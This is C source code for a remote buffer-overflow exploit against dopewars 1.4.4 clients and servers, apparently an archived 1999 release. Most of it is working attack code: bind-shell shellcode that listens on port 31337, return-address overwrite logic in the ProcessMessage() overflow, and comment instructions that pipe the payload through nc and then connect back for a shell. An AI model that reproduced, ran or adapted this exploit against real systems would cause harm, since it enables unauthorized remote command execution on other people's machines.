Remote exploit for dopewars-1.4.4. Exploit works for servers as well as clients. Produces a shell.
6ba59e6009b05be123b6af5928e78b018f173818061ec3c4bfedafabca9b0987
/*
* dopewarez.c - Exploit for dopewars-1.4.4 client/server. Produces a shell.
*
* URL: http://bellatrix.pcl.ox.ac.uk/~ben/dopewars/
*
* C0de by nuuB [Sep 25, 1999]. Linux version.
*
* 0wn a server:
*
* (dopewarez [<offset>] | nc <server> 7902)& ; sleep 5 ; nc <server> 31337
*
* 0wn a client using a bogus server:
*
* (dopewarez 2285 | nc -l -p 7902) & ; wait4client ; nc <client> 31337
*
* Overflow occurs in ProcessMessage().
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#define EGGSIZE 598
#define EIP_OFFSET 208
#define FIRST_OFFSET 236
#define WRD_STACK_OFFSET 0x0bb0 /* approximate for server */
#define OWNED_FIRST 0xbffffffc-132 /* 132 = offset for Player->next */
#define C0DE_SIZE 213
char c0de[]="\xbc\xfc\xff\xff\xbf\xeb\x02\xeb\x0c\xe8\xf9\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x5d\x31\xc0\x89\xc3\x89\xc1\xb0\x46\xcd\x80"
"\x31\xc9\x51\x41\x51\x41\x51\x89\xe1\x31\xdb\x43\x31\xc0\x04\x66"
"\xcd\x80\x8d\x64\x24\x0c\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\x7a"
"\x69\x04\x02\x66\x50\x89\xe3\x31\xc0\x04\x10\x50\x53\x57\x89\xe1"
"\x31\xdb\xb3\x02\x31\xc0\x04\x66\xcd\x80\x85\xc0\x75\x6f\x8d\x64"
"\x24\x1c\x31\xc0\x50\x57\x89\xe1\x31\xdb\xb3\x04\x31\xc0\x04\x66"
"\xcd\x80\x8d\x64\x24\x08\x31\xc0\x04\x10\x50\x89\xe3\x8d\x64\x24"
"\xf0\x89\xe1\x53\x51\x57\x89\xe1\x31\xdb\xb3\x05\x31\xc0\x04\x66"
"\xcd\x80\x8d\x64\x24\x20\x89\xc7\x89\xfb\x31\xc9\xb0\x3f\xcd\x80"
"\x89\xfb\x31\xc9\x41\xb0\x3f\xcd\x80\x89\xfb\x31\xc9\x80\xc1\x02"
"\xb0\x3f\xcd\x80\x31\xc0\x88\x45\x07\x89\x6d\x08\x89\x45\x0c\x8d"
"\x55\x0c\x8d\x4d\x08\x89\xeb\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\x31"
"\xc0\xb0\x01\xcd\x80";
char egg[EGGSIZE+1];
void bail(char *s) { puts(s); exit(1); }
char *htol_LEstr(unsigned long num) {
static unsigned char buf[5];
unsigned long n;
n=htonl(num);
buf[0]=(n>>24)&0xff;
buf[1]=(n>>16)&0xff;
buf[2]=(n>>8)&0xff;
buf[3]=n&0xff;
buf[4]=0;
if(strlen(buf) != 4) bail("NULL detected!");
if(strchr(buf, '^')) bail("caret detected!");
return buf;
}
int main(int argc, char *argv[]) {
unsigned long eip;
/* Try to land splat in the middle of the NOPs after FIRST_OFFSET */
eip=(unsigned long)((char *)&eip-WRD_STACK_OFFSET);
eip+=FIRST_OFFSET+4+(EGGSIZE-2-FIRST_OFFSET-4-C0DE_SIZE)/2;
if(argc >= 2) {
if(!strncmp("0x", argv[1], 2)) /* Absolute */
eip=strtoul(argv[1], 0, 0);
else
eip+=atoi(argv[1]);
}
fprintf(stderr, "Using EIP=0x%08x\n", eip);
memset(egg, 'A', EGGSIZE);
strncpy(egg+EIP_OFFSET-2, "\xeb\x04", 2);
strncpy(egg+EIP_OFFSET, htol_LEstr(eip), 4);
strncpy(egg+FIRST_OFFSET-2, "\xeb\x04", 2);
strncpy(egg+FIRST_OFFSET, htol_LEstr(OWNED_FIRST), 4);
memcpy(egg+EGGSIZE-2-C0DE_SIZE, c0de, C0DE_SIZE);
strcpy(egg+EGGSIZE-2, "^\n");
printf("%s", egg);
return 0;
}